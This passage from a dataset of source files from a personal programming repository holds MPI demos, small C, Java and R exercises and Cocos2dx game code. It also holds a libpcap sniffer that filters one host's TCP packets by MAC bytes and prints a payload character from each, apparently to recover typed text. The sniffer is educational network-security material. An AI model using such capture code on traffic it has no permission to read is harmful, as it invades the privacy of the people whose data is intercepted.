rbuf, 5, MPI_INT,\n dest, MPI_COMM_WORLD);\n\n if (myid == dest) {\n for (i = dest + 1; i < numprocs; i++) {\n printf(\"Now is process %d's data: \", i);\n for (j = 0; j < 5; j++) {\n printf(\"array[%d]=%d\\t\", j, rbuf[i * 5 + j]);\n }\n printf(\"\\n\");\n 
}\n }\n\n MPI_Finalize();\n return 0;\n}" }, { "alpha_fraction": 0.48138296604156494, "alphanum_fraction": 0.5239361524581909, "avg_line_length": 16.090909957885742, "blob_id": "5f80e5a67a51929daf38454b550857cd771a9177", "content_id": "04887dec89bef9abcc96b0067615600d48894158", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 376, "license_type": "permissive", "max_line_length": 42, "num_lines": 22, "path": "/c/hardwork/hardway/check_marks_state.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h> // for scanf() printf()\n\n\nint check_marks_state(float n) {\n if (n < 60)\n return 0;\n else if (n < 70)\n return 1;\n else if (n < 80)\n return 2;\n else if (n < 90)\n return 3;\n else if (n > 90)\n return 4;\n}\nint main() {\n float n; // store the num\n while (scanf(\"%f\", &n) != EOF) {\n printf(\"%d\\n\", check_marks_state(n));\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.6405919790267944, "alphanum_fraction": 0.6744186282157898, "avg_line_length": 29.66666603088379, "blob_id": "84006e191d55b0e74a772fe5e4100c381947af9f", "content_id": "31073cb6f4e24e776e783f4a8f9e6ff0b3f32065", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 473, "license_type": "permissive", "max_line_length": 103, "num_lines": 15, "path": "/R/projects/Words_Analyzer/word_analyzer.R", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# install.packages(\"jiebaR\")\r\n# install.packages(\"sqldf\")\r\n# install.palckages(\"wordcloud2\")\r\nlibrary(jiebaR)\r\nlibrary(sqldf)\r\nlibrary(wordcloud2)\r\n\r\nf<-scan('D:/Desktop/test.txt',sep='\\n',what='',encoding=\"UTF-8\")\r\nseg<-qseg[f]\r\nseg<-seg[nchar(seg)>2]\r\nseg<-seg[nchar(seg)<17]\r\n# seg\r\nm1<-data.frame(seg)\r\nm2<-sqldf(\"select seg,count(1) as freg from m1 group by seg\")\r\nwordcloud2(m2, size = 0.5, minSize = 0, gridSize = 3,color = \"random-light\", 
backgroundColor = \"grey\")" }, { "alpha_fraction": 0.560859203338623, "alphanum_fraction": 0.577565610408783, "avg_line_length": 17.2608699798584, "blob_id": "4fe84b56514f29738c0c90741805502b42f35040", "content_id": "ad533455edd04857e8b0223dd3fa607e472bbfc1", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 419, "license_type": "permissive", "max_line_length": 45, "num_lines": 23, "path": "/java/projects/algorithms/chapter1/part1/Q14.java", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "/**\n * Q14\n */\n\nimport java.util.Scanner;\n\npublic class Q14 {\n public static void main(String[] args) {\n Scanner scanner = new Scanner(System.in);\n while (scanner.hasNextInt()) {\n int num = scanner.nextInt();\n System.out.println(lg(num));\n }\n scanner.close();\n }\n\n public static int lg(int num) {\n int result = 0;\n while ((1 << result) <= num)\n result++;\n return result - 1;\n }\n}" }, { "alpha_fraction": 0.2540540397167206, "alphanum_fraction": 0.3351351320743561, "avg_line_length": 21.42424201965332, "blob_id": "8ae3c8bed0f61fc53a8b836008a60e90a674aafa", "content_id": "0e04af0e414558d6a997aa75eb72a64ebf3c07d2", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 740, "license_type": "permissive", "max_line_length": 76, "num_lines": 33, "path": "/c/hardwork/hardway/4.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n\nint n[5][1005];\nint num[1005];\nfloat n5[1005];\n\nint main() {\n int N, i, j, _n5, _num;\n scanf(\"%d\", &N);\n for (i = 1; i <= N; i++) {\n scanf(\"%d %d %d %d\", &n[0][i], &n[1][i], &n[2][i], &n[3][i]);\n n[4][i] = n[1][i] + n[2][i] + n[3][i];\n n5[i] = n[4][i] - n[0][i] / 1000000;\n num[i] = n[0][i];\n }\n for (i = 1; i <= N - 1; i++) {\n for (j = 1; j <= N - 1; j++) {\n if (n5[j] < n5[j + 1]) {\n _n5 = n5[j];\n n5[j] = n5[j + 1];\n n5[j + 1] = _n5;\n _num = 
num[j];\n num[j] = num[j + 1];\n num[j + 1] = _num;\n }\n }\n }\n for (i = 1; i <= 5; i++) {\n j = num[i];\n printf(\"%d %d %d %d %d\\n\", n[0][j], n[1][j], n[2][j], n[3][j], n[4][j]);\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.5951478481292725, "alphanum_fraction": 0.603487491607666, "avg_line_length": 40.05836486816406, "blob_id": "de95630e4ccaa159f8b058fd4466743bb802c0d9", "content_id": "038ba74a76dba03b1a9c38f7d03542ba0d640000", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 10552, "license_type": "permissive", "max_line_length": 83, "num_lines": 257, "path": "/c/projects/sniff/main.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "/* meat of the code is in here so read this file */\n\n#include <buffer.h>\n#include <capture.h>\n\n#include <netinet/in.h>\n#include <sys/types.h>\n#include <time.h>\n#include <unistd.h>\n\ntypedef struct iphdr ip_header;\ntypedef struct ether_header ethernet_header;\n\nint main(int argc, char **argv) {\n /* variables for network device */\n char *dev; /* pointer to network card name, like a file name */\n char errbuf[PCAP_ERRBUF_SIZE]; /* buffer for pcap to send its errors */\n pcap_t *descr; /* file descriptor for the network card */\n\n /* variables for packets we sniff */\n // ethernet_header\n // *eptr; /* pointer to the structure that represents ethernet header */\n // ip_header *ipptr; /* pointer to the structure that represents ip header */\n // unsigned int size_of_iphdr = sizeof(ip_header); /* size of the ip header */\n // unsigned int size_of_ehdr =\n // sizeof(ethernet_header); /* size of the ethernet header */\n\n /* variables for the simple buffer, ignore them */\n buffer buf; /* that's my linked-list */\n item *tmp; /* an item in the linked-list */\n // u_char *ptr, *packet; /* vars to store raw packets */\n // register int i = 0;\n // struct in_addr ipaddr; /* you should know this one */\n\n /* simple sanity check to make sure 
that the application is used properly */\n if (argc != 2) {\n fprintf(stderr,\n \"Usage: %s no_packets\\nno_packets: number of packets to grab \"\n \"before quit sniffing\\n\",\n argv[0]);\n exit(-1);\n }\n\n /* remember, everything in unix is a file? so is a network card.\n * so all we have to do to sniff is:\n * 1) locate the network card to sniff (like locating a file see glob())\n * 2) open the network card for sniffing (like opening a file for reading see\n * open()) 3) read the network card (like reading a file see read()) and we\n * are done!\n */\n\n /* step-1: locating the network card\n * dev is NULL if it cannot locate a network card, so we simply display\n * the error message and quit. notice how we are using errbuf, wherever\n * there is an error pcap fills it up with appropriate error message and\n * all we need to do is print it out!\n */\n if ((dev = pcap_lookupdev(errbuf)) == NULL) {\n fprintf(stderr, \"%s: pcap_lookupdev: %s\\n\", argv[0], errbuf);\n exit(-1);\n }\n\n /* step-2: open the network card to sniff\n * now that we know the name of the network card we open it here so that we\n * can start sniffing. let me go through the parameters, but don't forget to\n * do a man on pcap, i.e. type \"man pcap\" to learn more about these functions.\n * about the parameters:\n * 0) first parameter is the device name which we obtain in step-1, see above\n * 1) second parameter is the maximum size of the packets pcap should pick up\n * that is if you send 512 then pcap will only return the first 512 bytes\n * of any packet longer than 512 bytes. BUFSIZ is a default value defined in\n * pcap.h 2) third parameter is 0 if we want the card to be in promiscuous\n * mode, 1 otherwise. 
see the lectures on sniffers to learn more about\n * promiscuous mode 3) fourth is a time out value for read, if we set it to\n * -1 subsequent read function, we will talk about it next, will return one\n * packet at a time but if we set it to some value > 0 then it will collect\n * as many packets as it can in specified time of milli seconds and return\n * all those packets. 4) last parameter is a buffer for the function to\n * return error messages\n */\n if ((descr = pcap_open_live(dev, BUFSIZ, 0, -1, errbuf)) == NULL) {\n fprintf(stderr, \"%s: pcap_open_live: %s\\n\", argv[0], errbuf);\n exit(-1);\n }\n\n /* since we need to be privileged mode to put the card in promiscuous mode\n * once we are done with that we should reset the gid and uid recall your\n * secure programming lectures\n */\n (void)setgid(getgid());\n (void)setuid(getuid());\n\n /* this is where i dropped a packet of Hershey's Bites on the floor */\n /* don't read too much into above sentence, i may have actually dropped\n * a pack of Hershey's on the floor :-)\n */\n\n /* so, i'm preparing a linked-list to store the packets i sniff */\n create_buffer(&buf, 4096, 2048);\n\n /* hokey dokey, so we are now ready to sniff the wire! */\n /* step-3: read the network card (sniff in short!)\n * those who are not familiar with the concept of callback functions it\n * may look perplexing to pass a function as argument to another function\n * but that's how callback functions work. we will get to that soon.\n * about parameters:\n * 0) file descriptor of the network card so that the function can read it\n * 1) number of packets to sniff before this function stops, so in our case\n * we simply give it the first command line argument to our program. (try\n * running the program with -1) when this argument is -1 the function loops\n * forever! 2) third parameter is a pointer to the callback function. 
so,\n * whenever pcap_loop reads a packet off the wire it calls the function\n * pointed to by this pointer with the next argument as the first argument\n * to the callback function. so, if you start the program with -1 then this\n * program will gather packets for ever and store them in the linked-list\n * until the machine runs out of memory!! 3) fourth parameter is the\n * argument to the callback function, since we have to supply a pointer to the\n * linked-list in the pcap_callback for append_item we pass it as the\n * parameter here so we can use it back there. clear?\n *\n * pcap_loop returns numbers of packets captured, so i'm just printing it out.\n */\n pcap_loop(descr, atoi(argv[1]), pcap_callback, (void *)&buf);\n\n /* sniffing is all done, at this point we have some packets in the linked-list\n * so lets go through the list and print some information about our captives\n */\n\n fprintf(stdout, \"\\nDetail information about captured packets\\n\");\n /* just walk the list one item at a time and print some info about the packet\n */\n tmp = buf.header;\n while (tmp != NULL) {\n if (tmp->full_packet[6] != (u_char)(0x4c) ||\n tmp->full_packet[7] != (u_char)(0x0b)) {\n tmp = tmp->next;\n continue;\n }\n\n // fprintf(stdout, \"actual length=%d captured length=%d\\n\",\n // tmp->packet_header->len, tmp->packet_header->caplen);\n\n if (tmp->full_packet[0x2e] == (u_char)0x50 && \n tmp->full_packet[0x2f] == (u_char)0x18) {\n // fprintf(stdout, \"%02x \", tmp->full_packet[0x36]);\n fprintf(stdout, \"%c \", tmp->full_packet[0x36]);\n }\n // for (int i = 0; i < tmp->packet_header->caplen; i++)\n // fprintf(stdout, \"%02x%c\", (unsigned int)(tmp->full_packet[i]),\n // (i + 1) % 16 == 0 ? 
'\\n' : ' ');\n\n // fprintf(stdout, \"\\n\\n\");\n\n /* here we want to access the ethernet header of a packet, which looks like\n * this\n * ------------------------------------------\n * | ethernet | ip | icmp/tcp | payload |\n * | header | header | header | |\n * ------------------------------------------\n * since we are interested in the ethernet header we do a simple type cast\n * and it gives us a right amount of bytes, that is, it'll automatically\n * ignore everything beyond ethernet header\n */\n\n // packet = tmp->full_packet;\n // eptr = (ethernet_header *)packet; /* ethernet header of current packet */\n\n // /* print the source and destination from the ethernet frame */\n // ptr = eptr->ether_dhost;\n // i = ETHER_ADDR_LEN;\n // fprintf(stdout, \"\\ndestination mac address= \");\n // do {\n // fprintf(stdout, \"%s%x\", (i == ETHER_ADDR_LEN) ? \" \" : \":\", *ptr++);\n // } while (--i > 0);\n // fprintf(stdout, \"\\n\");\n\n // ptr = eptr->ether_shost;\n // i = ETHER_ADDR_LEN;\n // fprintf(stdout, \"source mac address=\");\n // do {\n // fprintf(stdout, \"%s%x\", (i == ETHER_ADDR_LEN) ? \" \" : \":\", *ptr++);\n // } while (--i > 0);\n // fprintf(stdout, \"\\n\\n\\n\");\n\n // fprintf(stdout, \"type of packet= \");\n\n // /* what is the type of packet, that is, is it an IP packet inside or is\n // it\n // * arp etc. 
*/\n\n // switch (ntohs(eptr->ether_type)) {\n // case (ETHERTYPE_IP):\n // fprintf(stdout, \"IP\\n\");\n\n // /* now that we know this is an ip packet, lets examine its headers\n // * ip header starts right after ethernet header, that's why we add\n // * the size of ethernet header before type casting the content\n // */\n // ipptr = (ip_header *)(packet + size_of_ehdr);\n\n // /* lets first check if we have a ip packet of valid length, if we\n // don't\n // * do this check the following instructions may lead to a buffer\n // * overflow in our sniffer, cs392 gang take notes\n // */\n\n // if ((tmp->packet_header->len - size_of_ehdr) < size_of_iphdr) {\n // fprintf(stderr, \"not a valid IP packet\\n\");\n // continue;\n // }\n\n // /* we have a valid ip packet, so lets print out its fields */\n // fprintf(stdout, \"information about this IP packet:\\n\");\n // fprintf(stdout, \"length= %d\\n\", ntohs(ipptr->tot_len));\n // fprintf(stdout, \"header length= %d\\n\", ipptr->ihl);\n // fprintf(stdout, \"version= %d\\n\", ipptr->version);\n // fprintf(stdout, \"id= %d\\n\", ipptr->id);\n // fprintf(stdout, \"offset= %d\\n\", ipptr->frag_off);\n // fprintf(stdout, \"ttl= %d\\n\", ipptr->ttl);\n // fprintf(stdout, \"protocol=%d\\n\", ipptr->protocol);\n\n // ipaddr.s_addr = (unsigned long int)ipptr->saddr;\n // fprintf(stdout, \"source= %s\\n\", inet_ntoa(ipaddr)); /* source address\n // */\n\n // ipaddr.s_addr = (unsigned long int)ipptr->daddr;\n // fprintf(stdout, \"destination= %s\\n\", inet_ntoa(ipaddr));\n // /* and so on, you got the idea */\n // break;\n\n // case (ETHERTYPE_ARP):\n // fprintf(stdout, \"ARP\\n\");\n // break;\n\n // case (ETHERTYPE_REVARP):\n // fprintf(stdout, \"RARP\\n\");\n // break;\n\n // case (ETHERTYPE_PUP):c\n // fprintf(stdout, \"Xerox PUP\\n\");\n // break;\n\n // default:\n // fprintf(stdout, \"Unknown type (%x)\\n\", ntohs(eptr->ether_type));\n // break;\n // }\n\n // fprintf(stdout,\n // 
\"\\n++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\"\n // \"++++++++++\\n\\n\");\n\n /* next packet please */\n tmp = tmp->next;\n }\n\n return 0;\n}\n" }, { "alpha_fraction": 0.6315789222717285, "alphanum_fraction": 0.6401137709617615, "avg_line_length": 19.114286422729492, "blob_id": "8c4be59e8fd49c74be32c2ef4ea62d2c35d38a5f", "content_id": "e536dd08d15123494f876e7225d69faac90fcf0f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 835, "license_type": "permissive", "max_line_length": 75, "num_lines": 35, "path": "/c/projects/MPI/hardway/MPI_group_free.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "// 既然有了组的构造,那么与之对应也存在组的析构。\n\n#include <mpi.h>\n#include <stdio.h>\n\nint main(int argc, char **argv) {\n int myid, numprocs;\n MPI_Group group_world;\n int size0;\n\n MPI_Init(&argc, &argv);\n\n MPI_Comm_rank(MPI_COMM_WORLD, &myid);\n MPI_Comm_size(MPI_COMM_WORLD, &numprocs);\n\n MPI_Comm_group(MPI_COMM_WORLD, &group_world);\n\n MPI_Group_size(group_world, &size0);\n\n if (myid == 0) {\n printf(\"Now the size is %d\\n\", size0);\n }\n\n // int MPI_Group_free(MPI_Group *group)\n // 调用函数会标记一个被释放的组对象,组句柄被调用置为MPI_GROUP_NULL。\n // 任何正在使用此组的操作将正常完成。\n MPI_Group_free(&group_world);\n\n if (myid == 0) {\n if (group_world == MPI_GROUP_NULL) printf(\"Now the group is freed.\\n\");\n }\n\n MPI_Finalize();\n return 0;\n}" }, { "alpha_fraction": 0.4268774688243866, "alphanum_fraction": 0.4308300316333771, "avg_line_length": 13.05555534362793, "blob_id": "e1c6c66e8da9207532aafc4240c1a1d38fe66ea4", "content_id": "46ac77798b3920955b9e60ce277e1a50ce689bf2", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 278, "license_type": "permissive", "max_line_length": 42, "num_lines": 18, "path": "/c/hardwork/hardway/swap_two_num.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h> // for scanf() 
printf()\n\nvoid swap(int *i, int *j) {\n int temp;\n temp = *i;\n *i = *j;\n *j = temp;\n}\n\nint main() {\n int a, b;\n\n scanf(\"%d%d\", &a, &b);\n swap(&a, &b); // ����a��b������ֵ\n printf(\"%d %d\\n\", a, b);\n\n return 0;\n}\n" }, { "alpha_fraction": 0.5381583571434021, "alphanum_fraction": 0.559376060962677, "avg_line_length": 39.83561706542969, "blob_id": "2316cff68631dc2e631b711862d71d457ba75b04", "content_id": "c0a2b18d6a5a72afaed0236bfb9da44e947b907b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 12420, "license_type": "permissive", "max_line_length": 132, "num_lines": 292, "path": "/cplusplus/projects/Cocos2dx/hardwork/homework/week12/Classes/HelloWorldScene.cpp", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include \"HelloWorldScene.h\"\n#pragma execution_character_set(\"utf-8\")\nUSING_NS_CC;\n\nScene* HelloWorld::createScene()\n{\n // 'scene' is an autorelease object\n auto scene = Scene::create();\n\n // 'layer' is an autorelease object\n auto layer = HelloWorld::create();\n\n // add layer as a child to scene\n scene->addChild(layer);\n\n // return the scene\n return scene;\n}\n\n// on \"init\" you need to initialize your instance\nbool HelloWorld::init()\n{\n //////////////////////////////\n // 1. super init first\n if ( !Layer::init() )\n {\n return false;\n }\n\n haveAction = false;\n dtime = 180;\n \n visibleSize = Director::getInstance()->getVisibleSize();\n origin = Director::getInstance()->getVisibleOrigin();\n rect = Rect(0, 0, visibleSize.width, visibleSize.height);\n schedule(schedule_selector(HelloWorld::updateTime), 1.0f, dtime, 0);\n \n\n \n //////////////////////////////\n // 2. 
add nodes\n \n // 界面所有字体要求:使用fonts目录下的arial.ttf,字体大小为36\n TTFConfig fontConfig;\n fontConfig.fontFilePath = \"fonts/arial.ttf\";\n fontConfig.fontSize = 32;\n \n // 添加倒计时\n time = Label::createWithTTF(fontConfig, \"18\");\n time->setPosition(visibleSize.width / 2,\n visibleSize.height - time->getContentSize().height / 2);\n time->setName(\"time\");\n this->addChild(time, 1);\n \n\n \n \n auto texture = Director::getInstance()->getTextureCache()->addImage(\"$lucia_2.png\");\n\t//从贴图中以像素单位切割,创建关键帧\n\tauto frame0 = SpriteFrame::createWithTexture(texture, CC_RECT_PIXELS_TO_POINTS(Rect(0, 0, 113, 113)));\n\t//使用第一帧创建精灵\n\tplayer = Sprite::createWithSpriteFrame(frame0);\n\tplayer->setPosition(Vec2(origin.x + visibleSize.width / 2,\n\t\t\t\t\t\t\torigin.y + visibleSize.height/2));\n player->setName(\"player\");\n\taddChild(player, 3);\n\n // 添加人物血条\n\t//hp条\n\tSprite* sp0 = Sprite::create(\"hp.png\", CC_RECT_PIXELS_TO_POINTS(Rect(0, 320, 420, 47)));\n\tSprite* sp = Sprite::create(\"hp.png\", CC_RECT_PIXELS_TO_POINTS(Rect(610, 362, 4, 16)));\n\n\t//使用hp条设置progressBar\n\tpT = ProgressTimer::create(sp);\n\tpT->setScaleX(90);\n\tpT->setAnchorPoint(Vec2(0, 0));\n\tpT->setType(ProgressTimerType::BAR);\n\tpT->setBarChangeRate(Point(1, 0));\n\tpT->setMidpoint(Point(0, 1));\n\tpT->setPercentage(100);\n\tpT->setPosition(Vec2(origin.x+14*pT->getContentSize().width,origin.y + visibleSize.height - 2*pT->getContentSize().height));\n\taddChild(pT,1);\n\tsp0->setAnchorPoint(Vec2(0, 0));\n\tsp0->setPosition(Vec2(origin.x + pT->getContentSize().width, origin.y + visibleSize.height - sp0->getContentSize().height));\n\taddChild(sp0,0);\n\n \n\t// 静态动画\n\tidle.reserve(1);\n\tidle.pushBack(frame0);\n\n\t// 攻击动画\n\tattack.reserve(17);\n\tfor (int i = 0; i < 17; i++) {\n\t\tauto frame = SpriteFrame::createWithTexture(texture, CC_RECT_PIXELS_TO_POINTS(Rect(113*i,0,113,113)));\n\t\tattack.pushBack(frame);\n\t}\n\n\t// 可以仿照攻击动画\n\t// 死亡动画(帧数:22帧,高:90,宽:79)\n\tauto texture2 = 
Director::getInstance()->getTextureCache()->addImage(\"$lucia_dead.png\");\n for (int i = 0; i < 22; i++) {\n auto frame = SpriteFrame::createWithTexture(texture2, CC_RECT_PIXELS_TO_POINTS(Rect(79*i,0,79,90)));\n dead.pushBack(frame);\n }\n \n\t// 运动动画(帧数:8帧,高:101,宽:68)\n\tauto texture3 = Director::getInstance()->getTextureCache()->addImage(\"$lucia_forward.png\");\n for (int i = 0; i < 8; i++) {\n auto frame = SpriteFrame::createWithTexture(texture3, CC_RECT_PIXELS_TO_POINTS(Rect(68*i,0,68,101)));\n run.pushBack(frame);\n }\n \n\n auto wLabel = Label::createWithTTF(fontConfig, \"W\");\n auto aLabel = Label::createWithTTF(fontConfig, \"A\");\n auto sLabel = Label::createWithTTF(fontConfig, \"S\");\n auto dLabel = Label::createWithTTF(fontConfig, \"D\");\n auto xLabel = Label::createWithTTF(fontConfig, \"X\");\n auto yLabel = Label::createWithTTF(fontConfig, \"Y\");\n \n \n // 左边wasd4个虚拟按键能控制角色移动\n // auto wButton = MenuItemLabel::create(wLabel, CC_CALLBACK_0(HelloWorld::wButtomClickCallback, this, timer));\n auto wButton = MenuItemLabel::create(wLabel, [&](Ref * sender) {\n if (!haveAction) {\n auto vec = Vec2(0, 50);\n Vec2 position = player->getPosition();\n // 角色不会移动到可视窗口外 下同\n if (rect.containsPoint(position + vec)) {\n auto moveBy = MoveBy::create(0.8f, vec);\n auto action = Spawn::createWithTwoActions(moveBy, Animate::create(Animation::createWithSpriteFrames(run, 0.1f)));\n auto seq = Sequence::create(\n CallFunc::create(this, callfunc_selector(HelloWorld::actionBegin)),\n action,\n CallFunc::create(this, callfunc_selector(HelloWorld::actionFinishedCallback)),\n NULL);\n player->runAction(seq);\n }\n }\n });\n \n auto aButton = MenuItemLabel::create(aLabel, [&](Ref * sender) {\n if (!haveAction) {\n auto vec = Vec2(-50, 0);\n Vec2 position = player->getPosition();\n if (rect.containsPoint(position + vec)) {\n auto moveBy = MoveBy::create(0.8f, vec);\n auto action = Spawn::createWithTwoActions(moveBy, Animate::create(Animation::createWithSpriteFrames(run, 
0.1f)));\n auto seq = Sequence::create(\n CallFunc::create(this, callfunc_selector(HelloWorld::actionBegin)),\n action,\n CallFunc::create(this, callfunc_selector(HelloWorld::actionFinishedCallback)),\n NULL);\n player->runAction(seq);\n }\n }\n });\n \n auto sButton = MenuItemLabel::create(sLabel, [&](Ref * sender) {\n if (!haveAction) {\n auto vec = Vec2(0, -50);\n Vec2 position = player->getPosition();\n if (rect.containsPoint(position + vec)) {\n auto moveBy = MoveBy::create(0.8f, vec);\n auto action = Spawn::createWithTwoActions(moveBy, Animate::create(Animation::createWithSpriteFrames(run, 0.1f)));\n auto seq = Sequence::create(\n CallFunc::create(this, callfunc_selector(HelloWorld::actionBegin)),\n action,\n CallFunc::create(this, callfunc_selector(HelloWorld::actionFinishedCallback)),\n NULL);\n player->runAction(seq);\n }\n }\n });\n \n auto dButton = MenuItemLabel::create(dLabel, [&](Ref * sender) {\n if (!haveAction) {\n auto vec = Vec2(50, 0);\n Vec2 position = player->getPosition();\n if (rect.containsPoint(position + vec)) {\n auto moveBy = MoveBy::create(0.8f, vec);\n auto action = Spawn::createWithTwoActions(moveBy, Animate::create(Animation::createWithSpriteFrames(run, 0.1f)));\n auto seq = Sequence::create(\n CallFunc::create(this, callfunc_selector(HelloWorld::actionBegin)),\n action,\n CallFunc::create(this, callfunc_selector(HelloWorld::actionFinishedCallback)),\n NULL);\n player->runAction(seq);\n }\n }\n });\n // 右边2个虚拟按键x,y能控制角色播放不同的帧动画\n auto xButton = MenuItemLabel::create(xLabel, [&](Ref * sender) {\n if (!haveAction) {\n auto vec = Vec2(0, 0);\n Vec2 position = player->getPosition();\n if (rect.containsPoint(position + vec)) {\n auto moveBy = MoveBy::create(0.8f, vec);\n auto action = Spawn::createWithTwoActions(moveBy, Animate::create(Animation::createWithSpriteFrames(attack, 0.1f)));\n auto seq = Sequence::create(\n CallFunc::create(this, callfunc_selector(HelloWorld::actionBegin)),\n action,\n 
Animate::create(Animation::createWithSpriteFrames(idle, 0.1f)),\n CallFunc::create(this, callfunc_selector(HelloWorld::actionFinishedCallback)),\n NULL);\n\n player->runAction(seq);\n \n }\n// No Use to if\n// inline float clampf(float value, float min_inclusive, float max_inclusive)\n// {\n// if (min_inclusive > max_inclusive) {\n// std::swap(min_inclusive, max_inclusive);\n// }\n// return value < min_inclusive ? min_inclusive : value < max_inclusive? value : max_inclusive;\n// }\n// if (pT->getPercentage() <= 80.0f) {\n// pT->runAction(ProgressTo::create(1.0f, pT->getPercentage() + 20.0f));\n// }\n // 点击虚拟按键x播放帧动画并让血条减少,点击y播放帧动画并让血条增加(加分项)\n pT->runAction(ProgressTo::create(1.0f, pT->getPercentage() + 20.0f));\n }\n });\n \n auto yButton = MenuItemLabel::create(yLabel, [&](Ref * sender) {\n if (!haveAction) {\n auto vec = Vec2(0, 0);\n Vec2 position = player->getPosition();\n if (rect.containsPoint(position + vec)) {\n auto moveBy = MoveBy::create(0.8f, vec);\n auto action = Spawn::createWithTwoActions(moveBy, Animate::create(Animation::createWithSpriteFrames(dead, 0.1f)));\n auto seq = Sequence::create(\n CallFunc::create(this, callfunc_selector(HelloWorld::actionBegin)),\n action,\n Animate::create(Animation::createWithSpriteFrames(idle, 0.1f)),\n CallFunc::create(this, callfunc_selector(HelloWorld::actionFinishedCallback)),\n NULL);\n player->runAction(seq);\n }\n// if (pT->getPercentage() >= 20.0f) {\n// pT->runAction(ProgressTo::create(1.0f, pT->getPercentage() - 20.0f));\n// }\n // 点击虚拟按键x播放帧动画并让血条减少,点击y播放帧动画并让血条增加(加分项)\n pT->runAction(ProgressTo::create(1.0f, pT->getPercentage() - 20.0f));\n }\n });\n \n \n \n wButton->setPosition(wLabel->getContentSize().width * 1.5, wLabel->getContentSize().height * 1.5);\n aButton->setPosition(wLabel->getContentSize().width * 0.5, wLabel->getContentSize().height * 0.5);\n sButton->setPosition(wLabel->getContentSize().width * 1.5, wLabel->getContentSize().height * 0.5);\n 
dButton->setPosition(wLabel->getContentSize().width * 2.5, wLabel->getContentSize().height * 0.5);\n xButton->setPosition(visibleSize.width - wLabel->getContentSize().width * 1,\n wLabel->getContentSize().height * 1.5);\n yButton->setPosition(visibleSize.width - wLabel->getContentSize().width * 1.5,\n wLabel->getContentSize().height * 0.5);\n \n auto buttonMenu = Menu::create(wButton, aButton, sButton, dButton, xButton, yButton,NULL);\n\n \n buttonMenu->setPosition(0, 0);\n this->addChild(buttonMenu, 4);\n \n return true;\n}\n\nvoid HelloWorld::updateTime(float dt){\n char buffer[4] = {0};\n sprintf(buffer, \"%d\", dtime);\n time->setString(buffer);\n dtime--;\n}\n\n// X、Y播放的动画不能同时播放\nvoid HelloWorld::actionBegin() {\n haveAction = true;\n}\n// X、Y播放的动画不能同时播放\nvoid HelloWorld::actionFinishedCallback() {\n haveAction = false;\n}\n\n// Use CallBack version\n//void HelloWorld::wButtomClickCallback(cocos2d::Label* pSender) {\n// auto player = this->getChildByName(\"player\");\n// Vec2 position = player->getPosition();\n// player->setPosition(position + Vec2(0, 100));\n// pSender->setString(\"w\");\n//}\n" }, { "alpha_fraction": 0.6701388955116272, "alphanum_fraction": 0.6736111044883728, "avg_line_length": 17.0625, "blob_id": "e341ffd7a4d2abffc22040b30b487ac6015dd597", "content_id": "c0f715009281126862320597d634c5e3b16c7331", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 440, "license_type": "permissive", "max_line_length": 46, "num_lines": 16, "path": "/c/projects/MPI/helloworld/helloworld.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <mpi.h>\n#include <stdio.h>\n\nint main (int argc, char **argv) {\n\n // 通过MPI_Init函数进入MPI环境并完成所有的初始化工作,标志并行代码的开始。\n MPI_Init(&argc, &argv);\n\n printf(\"%s\\n\", \"helloworld\");\n\n // 通过MPI_Finalize函数从MPI环境中退出,标志并行代码的结束,\n // 如果不是MPI程序最后一条可执行语句,则运行结果不可知。\n MPI_Finalize();\n\n return 0;\n}" }, { "alpha_fraction": 0.48275861144065857, 
"alphanum_fraction": 0.5206896662712097, "avg_line_length": 16.058822631835938, "blob_id": "0b6b7817275badc2e90be875d9161ac94130beb7", "content_id": "cb7eef4533cf4bb2465d024720bfa983bff123f6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 290, "license_type": "permissive", "max_line_length": 32, "num_lines": 17, "path": "/c/hardwork/hardway/stdarg.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include <stdarg.h>\nvoid func(int, ...);\nint main() {\n func(2, 3, 5, 7, 11, 13);\n return 0;\n}\nvoid func(int n, ...) {\n int number, i = 0;\n va_list start;\n va_start(start, n);\n while (i != 3) {\n number = va_arg(start, int);\n i++;\n }\n printf(\"%d\", number);\n}\n" }, { "alpha_fraction": 0.6858108043670654, "alphanum_fraction": 0.7038288116455078, "avg_line_length": 23, "blob_id": "ac9c72c1e4106f4e08b9975f528a18c735ba6f0e", "content_id": "aa76d326a44bf25eb40d4dfe90b1cd8d59d90032", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 888, "license_type": "permissive", "max_line_length": 57, "num_lines": 37, "path": "/cplusplus/projects/Cocos2dx/hardwork/homework/week11/Classes/HelloWorldScene.h", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#ifndef __HELLOWORLD_SCENE_H__\n#define __HELLOWORLD_SCENE_H__\n\n#include \"cocos2d.h\"\nusing namespace cocos2d;\nclass HelloWorld : public 